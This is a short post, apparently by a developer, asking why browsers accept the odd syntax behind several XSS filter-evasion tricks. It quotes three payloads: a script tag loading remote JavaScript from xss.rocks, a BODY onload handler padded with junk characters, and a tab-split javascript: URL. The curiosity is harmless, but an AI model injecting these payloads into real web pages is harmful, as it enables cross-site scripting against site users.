Reading the XSS Filter Evasion Cheat Sheet I have realized as many of the XSS filter evasions are due to particular and strange behaviors that are hidden to common developers.
In particular the following XSS filter evasion techniques have struck me:
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^=alert("XSS")>
<a href="jav	ascript:alert('XSS');">Click Me</a>
The point is: why do modern web browsers allow such things? For example, why allowing to have strange characters in the middle on the javascript:
directive and not just sticking to it? I’ve never seen a developer writing jav	ascript:
instead of javascript:
.